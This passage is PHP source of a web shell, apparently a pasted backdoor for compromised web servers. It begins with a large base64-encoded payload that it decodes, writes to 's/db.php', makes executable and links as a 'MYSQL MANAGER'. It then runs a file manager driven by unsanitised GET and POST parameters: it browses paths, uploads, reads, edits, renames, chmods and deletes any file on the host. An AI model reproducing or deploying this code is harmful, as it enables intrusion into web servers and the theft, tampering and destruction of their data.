Mm9TQmwrUHBlZFZOb0hBNGgwSlFOMS8xb00rQUJsSENoaHY3MDY1akpsRmJjOWVkUmVmUVZWUlFlL3YwdWJYaDljU1hhb0VLNDAzbVFVajFWSTBOYlB0R0d1TVA1QXhyQUE5Z1V1dFprVXRiaUMrbEFjTWVTMWZKSEFkUitVcElmK24yck9ISFlaOTdsLzVGZ0w0eGxkdmhxdE1vU3FYdHkzb2VsNHUvL2hMcUU4MWcwMFdjdjQra1FZSUdzZnBFYXo4YWV6Tk1vR253U05vcUVvWStwUzMzU0Zvb3NvZytvZWpKaytaemx6eFFJMndaWm0yeGFjUnJIOW8vOFVOSEJKTXVPaEZDVUgwZFFVcWNTZklhY0ZxTzJPaTVzbGZLRHVTRzFtajlTQkpnK0RrMmpiNGswaWNxZlllcjlDVVpLODEwK2s1RjUyejArcUZEUzk2bWlOMldkdGE5U1dJZG02Uk1XeVJsVGpsSnRBc2ZTaExyMkNSbDJpSXBjMWFRUkhQem9TU2hUb1lrcDIyU25GTk9rc3pwQjVMRU9qWkptYlpJeXB3eWtsTHhmaGhOV2NrUU5SbWFxc25TWkhIZS92QkZWMVRlRThYcmwxMUhtSjVYbFlNQjVHSUV2MUt3NzZuWXJkM2xaVkJPQnVWalVDNEc3V0c0di9kcWl1NjExOU5vZ2VZU1duMTE5OHBWTmlXVTF2S3VBOWZ5Y2JsZjVlUDZmL0FjcmZBVjFRWDJTRHVNcHV3cmtubGtaUzdqR1hxVXJUTUZlZEpRZDkwNjhZZGtkZFhkZ2Zhak1Tb3V2RVFrU3pCQWswVHcrSXMwRW5vN2t0WXI0RzI0RHJBdGh0MnY2d3hITXk4RTh4QktFU2V5eDJQdTVKMVlaZzRBMFRlTW4yMTV0MmE3dEdtNGdoQm1CUXR0L2dSY1BJQ1gvZzEwQ3Qyek1LdmxWMHF1VlJvQjdaN1gxY2c5cjd6elVNZTQ1bFZDNFd3d3FnYW1rWTJTZ01wMmNwNGJySTZaTkRXNUJYVzNrK21HUkl6ZFlHUzFiMXdEOCtySHFyTjNjTEo3Zk1xZUlwNDNwREFxY2pYeHorMzlEN3NuM0VQTWNQQWd4TjFqbm9iK2xZaFJrWjZJYUtvRzNCVnRrWm5udFd4SGxndVk1bjUyUENpRk0rZjVVMmJqdHd4SW50a0kwSEM2OTJlNUdsSEY1TXJWaFI4cjcvUHpwME8wSFVBblVRM3VmUHN3ZkRqYVFkZWdOUUludTZkNld2N3J0OTFqS09SVzdPKzkzenNWTFI2SFkyWStzUlRrN1pkWWI0VHl4SmZDMkdiNkY3dFpnV3ArNmcrUjg3Q0Y3T3p1NzBLcjN4MGZ2cmViYmpmWCtRN011UThaNHNZT3RnNVZ2M3ZQU2NrWGc1UlVPOE9sT0ZxNDM3ck9rRUxXbjJub09UVzE1ZTBBS2Q1QTdHYWJ2VXFlZjdodVR2eXRHRzZvSnB1U3FGMnU2cUordmVOUFBkZ3pZSzdqcVJsay9Qcm1kendlcG1NNVNMN0IzM1Y1OUFmcEQ2ZnYxbDlpaGp3VGc2eDllVHJXS2RQanlaZUhVT1RiRSsrOTBEdjM0eFhhZk4yMlFYNzZFYmZKTVZpVFBsZ0xpNTdLMm5ramZrTk52ZTBxSEtTNTVBMEhIaGxFR2Z5Skdadk51a3ZLQ254ckhWb1N5U0QvZ0NyK0Y1SGpjSzlFenVweUdmSWptQjFmUm81emFDVnlWb3l6eUZmaWtoYUZhekNnVTFsbW9hNkhPV3hYUXdiWnJaZ3pTbDFOWW1NQnRwOGNocUs5OWVwQnZnMS9FcVM4R0tzODVIVXBYT3BDejJwMTJtU1piU2lkakc0SWZab0dNYXlSdlVSRXNRaVNzTyttWXBKZDdLK2dBNElkRlBLTW9PcHl5U3lBYVZGcjBLbzJ6Z2FvMlNrQ2NlTWtGQ2RLb0hUVEphQk9sOEJtZlJpYU1XRGhzOGlvV2tkc2VMS2trcm9yZ0JCV3NUeGxnMjZNTE1LY0tBS3RJQW9nclB6cEJ0ZUpLL1VGckZIZEFqTXdwaEU0RGdUS0d3VlJreXA1aHJIMGJUWlJqVGRiQTdObEJmelU0MldCZklIRkZ1UnFKOUdYWEEzMk9HWEZFM1hEdlkvSU11VThXM0tadXRsU0pFZ0RyTVNMc2JxWjFzRGVUNGhhUkFxbnVGWWZSN3BkdHc5cmplVDhneHV6aWkwbUgyY0RXUlRuL3FvQnlUVzBNZ2FGMEdmRFMyOTB0R3Npa25DSjdwZ25UWldHUkJDbU1LT3FtZ2FlZ0p0cFN0RldITk1Ec0Z3aTFrV3JKbjRSQ21QMmVEQmJ3NmJVTXVzZzY4bEJKU1ByYWNua2tMeTNjcVJJcjMyZnNBM1NGejZSVTR0VkJ3eVdBZ3lRTmFTelRiUFRVQ2lGQUd0TTFXbTRJbDZHSVdwSFFZZ0YzQXJJQmpXY2t0aVdodnZhS3NMdGhOV1lpK0Q4Z2dtYlJ2U0UrN1RSY2xWc0ZRL3B4NlVmMzFpaEkzanUvV2I3WlBlRVQ1SW5vOXhJUThiWkFIV2o5WFZ4d2tmTG5wZ29VM1I5WFZ2VHlMWnlRNXBJYWg5SmNnWS96clExNnc0UWV5NkxCeGRuS0o5bUYvUWY2Y05JOGcxcXd4b3hPLy9aQUpMUmd0WU83ZllKckNDcUFyWXNaZEJndWxFSW94bWVVeTJ6ZDZRWFFkTGcyc2taSlZUZHZYRGlYdzlZZU5hUW9uK0ZCeU5RdlZVelNpV3h3M0NTYlFRakxMTGF6TnRsSE9OeC9RUzZRUjBSWmU1bDA3aStTOU9BaExqYkp5ZXpsYUZ0KzZ3Q3J1aUt2NFNpZDRwbDVjVDBoa2Eweko1aHlGbDU1T0UrZXlpZXV1aTdiRzR5VHJaOENkZGZYNE1MN0xubEdIWlZuOUhoaFBwNlpHaWZTRHp3UlhnR1NxSkxWYzd5bi9EY0dFNUdlcEI1dllFRUFMSEdOaDNaRnhWWTVXb1JOdFVRSVFaZUp1ejhNaUJTMEZXODJTeTZRbzNQcnBZeHJSN2xzZWdrbXBNbllPZTlQUVZKbTdQMHlFUzNHMm1xZFhJNFRLTGhTRXZabHRCMUxjUUpwOTNnbHVFYXVVaDVQeU5YRmNid29aOXE3cWNYMGFUcllEaW5vNWNGckpEczhjaG1zL21nSXlSNU9DTEdFV1lEeVUybmQ3d01CUXBmNnNvRy9neGdmd01WVG9zMWF5bTFyVU1iZWRDeWhVbzV4aWZJZ3diTkZrZWZWVUdobzg2bitGenplYk5wamt2cGpCUFAvS2ZBbzdhM1RDTmFVQmpOa1N6OGNlRE5hSHV4NWtWOTkrQjArSThQaDZlN0orVGFWRTNvY2ZQd0NKbXA2WE5nT25RR0JyQW5XalpzbE9wbTJVMVJSeWFzN2puUzlsQXBlWDd5RCs3aVJxOTRqR1hXUW9rV1VyZG0yNFBWR2xwb21DaVRaM2dnVlRXTGhkemZlZ2tZOTZGeE9XajU0QmFjekx3YnZqM2MvL0QrNEtTd1NEaktLcnJLeVhTNThkM0xoY3pWYVMvRlQ3TWllSDZ2bXROUGluTmFMdzV6T0lyS3BGMHc2YjBML05tRVJzck94UmlpUXViQmNqWXJaUDd1M3hUeXBIdWprTDk3bmNaZU5oZG5oMUlwMGEwb3FwSjk2RlBVWVdPNHE0NHdiR3gwWGkxMkNvVXlBYUI4aU1KNUJBb1FMaHF3aW5FM0pxZ0RPa0p4S1c2azczWU0zREl0QWJNd0luQ21FMUNHTG51WEdJZlJyb1Z1S2doazRwMEF5RkFFZUJ5T2trVm5KUml3K0I1UXlxZjBaVWdhaGxWd2VrQmcxcVVqcmVSYk1kcG1tZkNXN05KNXI4bEZXZTZ1T0p6SnJCdDdNNjFaaHkxZnYwd3FjVktpUytYYnE5V3FpODJlNVVOSDFVeXExTlllTDkyQmoyUHY0ekxxbUxNaVkzMUlUQi9Zb3k2OW52ZkdjdzkvYjBiNnJOaWVWN2luTzRvbmR3WnAybHV1Mmw4WFlEZzRKUnR3N3k2VDhrdm11U1hzczBQLzlmTHRMcmxCd3grRElXRXYySUUrbnFBckdzVzl0RmdoYTJ5cW1xNDhxUGkza2s1Ym96SUJOWUw4R0tNYXlpUlRWbFhKYUNhODIrdURuck1DNmtGT2UzbG1heS9QeTdVWFptQ0pjbUtMbmkrc1hKdTl5SFdjbUhuMXJhalJaTlVWdTNOYWVkbVR5WTFDbXpMci9mdlI1NE00VGYrRFRCYm9GM3hjZFdISkNHVnFLRFhMYUVMV3hDVjlCNFhCYTMzWnJRTUwwYWhDOXVtZUJNYmxCSm82R01IR1lLQ3hNY2xGMVVIMWU5UWp4ZS9uendoL0t6RFd1YmkyaWpxcVE3TVQ5RUlTVnNsVkFCS3ErdEY0QTM3NkVVaU1VZGx1dHJXczNjV1RGaUJ4eDFrK3haZDFaTlZXbTFzTmVsMGFvYmtSVjJFVThHS2RiRkd6M25vQyt3cnBmdXdyK0lVaTR1VStWbUtqRUJPMFBTVFZGQSt3YTJFTEpVTllMVW4xb3czSS9oOFF2SUgwVU5GM2xlc2EwMGgrNVhYaTIweWtocmtXZ3ZSby84cEdDTENrZC9xeFV4ZE9QNlNmcVZPcnE3TW92T3VvZmtCdUdnZno2b3BCcThtYmtJYlFJdmJQTlNWbm83L1IvK1hzdjZyOVgvb2J0Y0V2K0dzalFJSUNmdWhxSkttdzN0eWpuV2cyZzVySTZINnk5dCtmWVJSdXEyZjlxOEZhalJPUWkwaDA5WHFGNnZsSjRVaE9GWnkxQmh4RmY1dmRPQ3Q2aHNQV3Bkbi9iVnZQU3RXYTVvYWVNeHg1QW90NW0zWkhvMjVWcGloRzJUMzYyc3daeWszcy9SbERVU3NZaDFvSnRuUWxTS3l0VVR5YVpJRzZpSUhsUTc2ZXhTaUEvd0V6RE9SUEhoRHpDb0RBMWp3Y1gxcklnT0hDQjVrWFJsZXh0K2hSTTJDYjRhRExYb1VSUTdXYWpKK2tqanNaYVNWbG16U1A1bUhoT2ttU1JHT2o5LzNibUFKYWFaTkJDNVZScXhBZUFiMlJjUkVnUEdHWEFkbXblueGxVMGpydnZ6dE1Rc0xuSWlYRTlzR09VRW9JdEtDQlFZOW1RTmhQTUJ6UGZDODBLREpLdjZ5YlUwSDlrRlZReWw0OW54V2RNcGVaZGVUWUo0T0FYV1hBVEVLcVhHZGwvc0pkZ0w3blueaZkJQUEZuOTBlODQ4OFFyMjN1QU5jS2RzOHlKSWMvbDJTTm9Mem95T3d4bTIzY0tJeEwzNXRPeVFuTWU0QWlBOXVUS2hCWUFKc1lxMnhlTEJXMXdnNTJhLytYMjgwdGx3UkhOWnljYnA5K2tENTY0c0NRNVl0TUVFbDBvM3VwTjhTVGJuVmNVdWFKbHN0U1JlbDl5V052b2JRU2E1STB1KzJISERrdnI5Rm1tbVNsVEoxalNGckFPU1M0MndHTmNiUU1kY0JkRmlMTGg3VTFxNnRzT2xKQ0xnTzdCeFplblczTkRoMmwrT1hkbzNuSDd2RUFKK2VEdldGM09IMjBrL1J2WU9ITmduTWd6cUVHV21tVmtkRjBKVUhycGxHb1ZGaTZwRENLcmxGMmptZkIrTExyNkFzVUpFR3BJVnFMelRpUmNKZklaK0l3RjcxSVppQUxaVzloYmFRK1hmNHZsTEVLblNzakVTWVB2NHdWTWVudGh1ZWdWeFR4UjdPWmw5MnRiMWM2ck5UYXNjUGdUQ1R0djVONW1CdHRheDcwTXRIeVpueDVJdkRTR3VpWm9NVHJtWHRBTng2eDdTVmpmYy9ERklNbGUySms4aDkyYW1Uait4NG5SM2w4dWRPakU1WDhOcXhseDBobExyeU1aQ3gzTHBaSndqc2hyZVgwQlVocmNXVWhWeTB3VTVXWDJwZGFvaFplRnU2MjZKek1MQ05saFdld3JuQ0Rua2FwTjVOaDRtM3RwY1A5NFk2VzBjWlVYcTczaDJLeDhRZTREYzBkOFVvOGhXMS9rNXdHZDdwZ1NjRldYZXc3RG5mUzZXZDlEVmhnSTM4SnlKOUxNRXVhOXgwVDhtOWRJV2oxSFhYOVFLMTZ1azBnVGdBYVJScmQwYzc0TXZvT3BjekZCQXdVdDFBNkRSbVozaWgvSDhJeDcwTVk0dWdMZ2hUeUVWTFBtOXlJSE4xUmFpcXdHOFc2a2hGZGhiRm5YM2JadmFiYlFXelFZK2dWaldRLzYxeHh5bUpjNnBuN0VvV0lGeHdYNldxaDZ0UFlzaSsxcm1ZcGpxOExzZk0vL0NDaitFcXVlb0VhR0UxdStJWWRYL3EyNDZoMDhCb29vd21IZ3RIZE5YZHJFbnhTM3JpUzY3dnl3blB1WnFvNkJteXBxNmQ4MzVOdVo5Sm0wZWE5b25ndDFTSHpnZSt1UTBNNnVoa2IwQTVsV3Bpb3QzRVVYUVkraGJUWEJic0E0ZmNzbUpJS2l1NE9rSm5CTlRwWXFFL25zMmdFeTdSQ0dnNjZRZFNUQm5YOU1rdUhJLzA1Um9ocnY1SVZ6bHltQjluMG1JdnIxdlF0QUVtVGY3K1N2OXU1aXBqSmlpZnNzL0tTbWZVaURQMGVIaDBlbjZJVzJoVlBuejZ4d21kQTJwZDNWM2RpamFqVzg2MzFVRkxuY3lmUjNBTWxEL05sV3dweGpPeENrbTRqUDVhZW8vRXlMdmlRK1BFU3kvMUVSaXZHWDZHZDBOUFZHVkFGVVpHSkVFMm45RFNQZUtiaXE4aVhPUGFER2RmZU1MV3RtQzVDaXNDTWt0NlpZQzlhSmNYM0hMZ3c5OXdEQTZrZWlIVWhxWnRhcW1oTlZMSWdHQ2tteVJPYUxUbWhDdlZhV0FkQk90bG1RYzBxQXN2U0dtQmdFbzhmaTlLQ3hNWnZZaW5Wa1JuVktXV0MzVC9tSjFvK1VaRTFYOXNrUlllUlN5cllkVnRPWmFaRHRjaHphSHVMenN3Wmkrd0podnAvUmJBTS9teWhrdk11aUJQV3cxeTVQZzFwSlBqMTZOMkczWWtXYkxOSTd5ajJQOW5rdEZzTitVT3pRTUQzVnBjR1FGVFUxVzZMT2VpaUNYQ3hhK3dnUElLR3l4aS91ckdJQWh0NHhwOERibVFuUHpRTmUyelVLSDhuTHExcExoMkEzS2VnTUQwbWVHUE1vaWErdnArRWc4bnNlNGxOSnU4U3R4TFl3VVh2Q0t1U3JxWkxaRkFqSVdCbXlZdnhCaVFuSldjUjZKK1lYNldSZlhYWFd5ZXNkc2gzUlhETC9LY2ZUN3pRNjd6WmZ2djdyOGVISHc1MjJ1TG5kL1JQUjc5NThoSjJ6dkozUmZCcGtlekxCSm5EVnJMenRTT0FicTluYnE0WG1nSHpHVFFpdkU3ZkZzcTlhbHZ1QzFtcURIYVRKZ1hMMmVSYjgyVTNwQmtCNlVIYTNpUFdGV3JrNG43Mk5SQWZQMm1sUlQxb3M3SGhoeE43R0RMNmpIL3RqNWNwM29tYytqcDZ3R3hRd2hTQU5GUzE5TE9GV050bFQ5UnIvQ2JvT3FKUVIraUE2bitnVTFVNkIxRUZXa1lYRUNZWC9tdzJ0TkJLSEs5TkFiZm9iaXczU2VyUFZjTXlMMCsrNWpLTlJPRUhJSG82a2QvdlljOGhaZ0x2cEMvM2JwSTQxT2xGdkN3bnFrcS9sZXpySUJsQ3pXZ1pqL0dhS21KWThFMWQ1THNUTzdWYVlSRFpuL2pvOWRTUGNITzJBQnA0MFRmR1FQZkt0TjVxYnFvenpkY0xkUS9XYU5acW1jZXNORmd6Q1BDajQzMFJLK1VsdmFDSFBYbGVPVlNNZWlicDdCSU4zeXhHU1U2LzIxaXVyNlZwekdOc0w5OHRReW5CZm55OG5kdFY5NU81RkM4b005ZW5zRXdTaEtpL3pnVjJFQUxpYnZhUzcyMmU2TVFmTGM4NUd0eFdpUFZicFBkK3ZUUkZnMWNDZ3A0Mjh1TWhMbEF2QmFXaTdERlQzUG8xbFZvZGpFbXQzQi9GRVY2SjgzV0FpMElOMjJBQ0hRd24xYVRtbXFmdFRHZnVkWFd2aTFlWjFTdFYrTTB4ODExKzNrRmZqZ0hsT2J3MFowVXlOcitxdzkzYkZKZUpOWXV4K1RVNyt1Y3R5Tmd3b2tmUUVBTmVqK1o0ZTQ3Rk43NTQ4MkFmamp1UjUvY25yR3REQXFiMmloaGZzblRDeXd4dGZVMWJSWXZUZlcwNnlTNmpteU85NHRxQWl1VlhyQXBDNmFxM1RyNzFhd1Q2R0JndklhcmJoK3JXb1Z5L0ZISjBTaStId2ZZRWRCSVdFaUdiMUYxenZ5RUx3a2QyeWNyeThTekExOGxHUWVqRk54MUhNYWl3eWpHM1pEcXBoMVVmVitpM2RmZGVIVTF3dnYzQ3E1Q1o3S2ZseThyeWVCK3p6eXFYQS92SjFrODFXNDBYRWp2d0VkOFp0dEZMckhUeUhpejBtUjFEWkZVVHlpdnBqbjFRSnlVd28xYXY4NVhGS1NuQVRnYk9QdjZYUi80Yys0TTh2a2NWZ2VmMURydWwrT2M5Sy9iVGZNVTdrQ2lHeUt5Q3dFVkhseTMwUnVkalcyWkRjbTN0YjV2ZGJwT3VIT09UUDZRSjRpdGtaZElIMXNrUmlQZHFoUlZXZWt4Q1ZNTG9pcDVOMERFdE1vUENRQm95OUVQbkNhdXkxTTVOMllxbm5qV0p6bXJvalkweWFJcFdrU0VxTXJzdTFzR1N4VmVrTm9wdGs1LzRrblIyeXNtQ2NxWjhXREJiYkU3UVJrZ25nWHBUS1hhRnpoVGwrUmpEYXg4dyt4RTJDWmM4TFdPSU15eGFidzNxbWZTbWVpYTFzbHpJemdSem02NUVMM3Rtb0ZZeGtRSHNTY1k1NVJ6QTU1NHFuN3pZT0VkMDBJajlnTFVHVWIxVVVGM1J0Ri9sY2c4aU54c3Rhd0JiR2NBLy9DUjdpOXpTYTZDQ3BSQmtHd3pmb0RFc3d3UFZZTFVvcGg0aWVnU0U4aXFoQnFmRmdvUnhyY2lXTWdXTEJzWmVxWWdtME5qSnZ3ZHBzTGRHY2M4MUdtT0Z0aXJMZy9SSXFaSzhONUZEbEZIWjdXeDJMSkZheldpUnFKUGJvSzB5L214bXBuZXpJRGsrbXRaTG1HSjdDcFhJZ1h1RGFwMDg1STU5WDI1aFZGQ29ZQjBQMDhtdzNHNHBnZTZMNW9zbkw1NjJYbTdLTngza29USTVaQ1hRaGdVa2ZvRUV6Q1BNYTRvR1dObS9qdXhwWk9GOSt2TFppK2QzSWlXSUlzYjNxekIrb1kxbHJmdDlsSHUvVngzNzAyK0VlSE9UeXZsdEpqWVdLa2FTUTE4Yy9YYjBuOEZDUHFCWHdkTk1EcUZSWE9aeVVLS0N1UGFERk5LdkN3YlArWi9qYUw2STZhVUdBa08vQmxUaEpUeSttdWhRY0tNZElNYWFvUGR2OE9veGhTd0VNU3BjMENYMTRDeVdkT2tzVmF6M3hLOSsrZzR5OXlHVDYzYzJOdGJXMThUNitzK1BmMjYxbWkwNytFY2pKbDJqMjBOTlEyZWVEYnBLdEgrcXEvZGdFZU5heTRyeHF6N3k1NHRVdGZYeDQrcWpYUE1oSy9NNk0yWFdRTStDRDlsQzdvL0tZcllvWnNqcHF4cFY2elZybjFmMVFEK3ZiZFFzZXByWkZGQnMxcFFmTXdTRFNKZ2lrTXV4bTFNYzJOaERvRW1kRHBod2J0allPdW9KSklLNWMvd0tiNUpuM2dKWG8rZE5KdStveGJJUmRaR0J1eldSM09zOW1JZ1VHaUtyVWs4UnFNREcyNnlva3R4ZUtab0tNd2lmZzBxOU5CaURabWk2cUlmUHVwbUVHeDd5TlZ1bUxrelFFUjBzWFI4UGN4RGdvcVlsRXBZOTZvSTZRd2FMU2pWY0hyQXVJaE80dHphNHNDTWZ2ZU5Xb0kwdW1aSnBQSm5qRlE4bWNtV3F1VWZqcGVnWEZIblAzbXhvdmVPNUtkaU1ndjZ4NDQ2b2RBenJBaHRSWG9xdldtdUlybkQ2MTgrYS9ldW5vLzUxOHhuOC94eitiOXIvTzZwaU5Kc01wVnRieU5nbmE0U1dZWEM5dVJNbHAyZzhWekFsemVhbWRQRkRTbW43ZGprQnZFSnhnNmZqb0xxMjliZUdNdGZTRkpJejl3WSszQUVlVWZ6OVpaNkVMcVdHSWtBbld6ekhRM0xKbmxhK2JPTGQ2S3E1c2d2WWJoTXFWTEZmVnIwZ1hLTGtIcFNVc1gxdnltN0Z4b1pBajE0d05WcElXZmZXWmZlMnRzVG1zNXI0SzhzRDdnYVd0WXBsM0Ewb2JNR205OWRQUDFiTE9vTEZKWFYxVjZDOFNOYjBwdGNUcmVJT3J3VUdUbE5VZjltTXo4NEhLWHRXYXY5S0NrMWt0UW1vVS81MVZTNnA3R3lqT2NKMzlQMXJxdkFEL3RHV2F4YzJWRVp3OW54Z3ZsOE1mdnF4a1N0L2FwVS9LeW5mdE1xZmxKUTNyZklXUFVXT3J6UzR1a0c0MGdoY1p3QUdweU9EbWVNZnNndnhDZnovMUpGRkRTcHJQVldMMGVTWkJXcmx2Y3psYVlwOFdSb0dhY2d4eW5yN2hGSGlUU2JHUHo0RFA1OXNXcmwveWtmOWpLNWdWOG5oK3JOUVRXN1hhdGYraytkRXM1NnJBalA5YWEwT3RnODNITjJhQzI5OFdYWC9pYk1CMnJTaUFPbVhGOG1PRmdvL3VZYTIzakVMRUUwcnQ2TGViWkZKYXZIL1JUdXRUVmRLZUk2MG5NWmtPZnBYUTMyUUxIdWc3VDI2QWt4TFE5YXNxZmRGSnJFL3pzbjVGdnkvU1ZPRVN3dXp5YzYySnQ0OW9LM3BwN1B0R1doeVM5aFdXcVk1VjFacUQzS3V2RERPWWhWVTgvK2hCRnY3WkhObGtSNTNhNVBOS0dGV1BrNUlQUld5akZZVFZkVlMrenhQSTRJckduQ2tvK2s0Wk43NEN2UEttcFBjQjhETUNrUXBxQ0pzK3hMNFQ3NElYYlZod0RNNlNjTWVRRkJ1OGNTamdMZDJiN0FmREpmVmRKQXRzSkRZcFNTUHNDZ3p5MHRjQ3RuM1NPa1h2VVhhVmZvSUJiY3U2Y1pCK2Q5WWtUSFUvUHlzQlk5cktmUFhWbVFrZVZWQ1RqRUNnQzZYZEZ2Nk5reGlSYlRMUDVKaTNYUjE3R3ZDQkY4ZWw4Nm9hdGJMdG9aWXZsdll6THA2c3RmNmd5TzZjVTExelROVEJXWVlrem1qeTVBRGxjS3JsUU5IdmZva1RUZ3VjdVFWYlVmOUVhRWN4cDNkZDlzZjlrK0ZLK0VsK01CMXJDdG5YQ1N2anFNMzBQa0QzK1FwdzZmK2drMUpkWGtGbk9xWFY1YVFCRGd3Y3djOUpaSzdNdnpLSHJIZmQvOVlQVjRjcWxVeVdvaEVjdVNTVG9Fd2g2NjlEL2tQcWlqTitWSzlvKzhjSGUrOTN6Nyt3eUdqaHFBUG9uQUlDdFhIcGM4UldVMGJvZlBoWU84ZkgzYi80cVRtaDIxU0IvaFd6eGtEcVBISjVHV01rTnQ4S1FzbmFzbmJhTGFjaDZicGttdlVTOXJPK0J4MFJwYlVwWG9taWlvbE5icWRLWjlYQmZTMU8yWXIxc0hhU1ZkSkw0V2w3dFFkOHl5N1pGdlhZbHZwaUFzaGkzRVlSVldqcjJXWGh1Mlo1dFkzNjgvcDZxVGtzbU56UGd2NW9yWnFMU0ZKMmRBOFpmV1VaclpPSC9iTGZzaWNzQitFbmw3RlFVcUhxblZUSTNzUmxuMmF1bEQvbVRoNUUyWEZMWHRIZWI2MW5DcTVzZ2NZN3ZlU0FRS1dDTmppUzhEeTdkK3F3NW9RVVNMWGpSOTMxMXNsY2xUU1hsdkx3RzZabHQ5SEtqYTZlSmp6SlpFbzBjZ24wdkJtZUlabXVaalRFc2xnemdLNGpyclZtNHk5aGErUDNFcnd5d3R4dDJXVHF0YjVmcE5ETG1FMXZDdFE0bkZiQ1RKSFA4eWUxVm1XVUFzZk56YWU2aVh1M1J3bGdBVUZMV2VoSzBpM2ZCbzNIT3ZaZHcyWWp1alZRQk9IZi8rL0hQRjB4WFdsMnd4NmpteituTGwxN2hZYnJPT3EyWHptT05pdTY5Ymt0WEdPSnFMWDdpdnkrZno4VS9neXVydVNmMitmUGlpVzJ5bW55eSt6VnJ6NDNFanVHaC9YbnAveEs2OGtzKzFrRHhUZlY4S1JRZWhVaE4rRHZ1UGdoWGFaRHd5RWpJNUM1Y3U5Vk9GUzZWZTVkRnY5QVF2S3BXZGdCN1IvMldrdytURkF4TlhZK1NrN2cxMmxYMlhUZER5REx6d29NbHpLYjh1YTJpcjlLcGR1NHhNTHdDOGRhMFdsNnIyNmdYWFBuMHFJNkNBWG5FOGxsQmhZNDRhWnRFT3FQMnVReWRIRGlabVVHSmc1d0tSUW40SThNeGo4U1Z3ZFVDaS9mRHZBZnFIQitiZHJwbE1hNDJNOVhWaWNxV1lnOU1PRDh2RVNsY2Jwb3I3cFZsWU91dUU2S3BMMElaTkp6YUhTbVpCNWo5RG1zOWhTZjFJd2QwdWt5TTh5cnV0TzlaeWl2NS83eFM4MERvcFJIVmFoZGVrNjk0ZDdlYUdyWngwSFhWSXo5Y3ptK21ha29ReXZvMGh3aVd4cmc4RktKbHc1Z3ZKNjZqKzZSOElrVEtkTEdhN2VUYk9sc0g0Y05qZHorSS9zRUJhT0w3WEZqTTZCbWJQUWYyMkhpdVM5VWd0WTUrRFJuaitiR3FGRWZ5ekNua2dxQTZTbi9Fc1NhbUZRU2twUVd3Q3lmbXlJeVRTMEN6dldjdVU5RzRxVHZkOHFsZkd6TXBkVG1DK2piR1UrcC9SYWxlM0w4MSt1QkR0Z1N5MHZMWEZMSG9VcVc5OG96MHRXdDJRRDN1S3kyU0RUZU9taWFaZ1YwMjAvQXlYVFhiSDU3SnQzaXFKY3p6MEcxS2ZYZ082OWtMRUhXczdDTitaaGUxVWVmbXYyczN6c1dZSTE4eXpRb214M1YzZXhNSlpOdjhqUExOVi9Qa0RseTFmV3pTdVJoVWQ1MkVDRXdlV1FkZGxMbmU2dmVPWHdoSlBtU2NQY0M0VGxUVFk2MHlySUJYVEtzMjkxTFdLZndpNFdvQVduUXlxMTdscXBVa0x5dnk1QjhBdz0iKSkpOyA/Pg==";
- $write = fwrite($f2, base64_decode($sml_db));
- if ($write) {
- @chmod('s/db.php', 0755);
- }
- echo "</br></br><center><b>GO TO : <a href='s/db.php' target='_blank'>[+] MYSQL MANAGER [+]</a></center></br>";
- }
- }
- ?>
- <center>
- <?php
- echo '<p><table class="explore"><tr>
- <table width="700" border="0" cellpadding="3" cellspacing="1">
- <tr><td>Path : ';
- if(isset($_GET['path'])){
- $path = $_GET['path'];
- }else{
- $path = getcwd();
- }
- $path = str_replace('\\','/',$path);
- $paths = explode('/',$path);
- foreach($paths as $id=>$pat){
- if($pat == '' && $id == 0){
- $a = true;
- echo '<a href="?path=/">/</a>';
- continue;
- }
- if($pat == '') continue;
- echo '<a href="?path=';
- for($i=0;$i<=$id;$i++){
- echo "$paths[$i]";
- if($i != $id) echo "/";
- }
- echo '">'.$pat.'</a>/';
- }
- echo '</td></tr><tr><td></div></div>';
- }
- if(isset($_FILES['file'])){
- if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
- echo '<font color="green">File Upload Done.</font><br />';
- }else{
- echo '<font color="blue">File Upload Error.</font><br />';
- }
- }
- if(isset($_GET['filesrc'])){
- echo "<tr><td>Current File : ";
- echo $_GET['filesrc'];
- echo '</tr></td></table><br />';
- echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
- }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
- echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
- if($_POST['opt'] == 'chmod'){
- if(isset($_POST['perm'])){
- if(chmod($_POST['path'],$_POST['perm'])){
- echo '<font color="green">Change Permission Done.</font><br />';
- }else{
- echo '<font color="blue">Change Permission Error.</font><br />';
- }
- }
- echo '<form method="POST">
- Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
- <input type="hidden" name="path" value="'.$_POST['path'].'">
- <input type="hidden" name="opt" value="chmod">
- <input type="submit" value="Go" />
- </form>';
- }elseif($_POST['opt'] == 'rename'){
- if(isset($_POST['newname'])){
- if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
- echo '<font color="green">Change Name Done.</font><br />';
- }else{
- echo '<font color="blue">Change Name Error.</font><br />';
- }
- $_POST['name'] = $_POST['newname'];
- }
- echo '<form method="POST">
- New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
- <input type="hidden" name="path" value="'.$_POST['path'].'">
- <input type="hidden" name="opt" value="rename">
- <input type="submit" value="Go" />
- </form>';
- }elseif($_POST['opt'] == 'edit'){
- if(isset($_POST['src'])){
- $fp = fopen($_POST['path'],'w');
- if(fwrite($fp,$_POST['src'])){
- echo '<font color="green">Edit File Done.</font><br />';
- }else{
- echo '<font color="blue">Edit File Error.</font><br />';
- }
- fclose($fp);
- }
- echo '<form method="POST">
- <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
- <input type="hidden" name="path" value="'.$_POST['path'].'">
- <input type="hidden" name="opt" value="edit">
- <input type="submit" value="Go" />
- </form>';
- }
- echo '</center>';
- }else{
- echo '</table><br /><center>';
- if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
- if($_POST['type'] == 'dir'){
- if(rmdir($_POST['path'])){
- echo '<font color="green">Delete Dir Done.</font><br />';
- }else{
- echo '<font color="blue">Delete Dir Error.</font><br />';
- }
- }elseif($_POST['type'] == 'file'){
- if(unlink($_POST['path'])){
- echo '<font color="green">Delete File Done.</font><br />';
- }else{
- echo '<font color="blue">Delete File Error.</font><br />';
- }
- }
- }
- echo '</center>';
- $scandir = scandir($path);
- echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
- <tr class="first">
- <td><center>Name</center></td>
- <td><center>Size</center></td>
- <td><center>Permissions</center></td>
- <td><center>Options</center></td>
- </tr>';
- foreach($scandir as $dir){
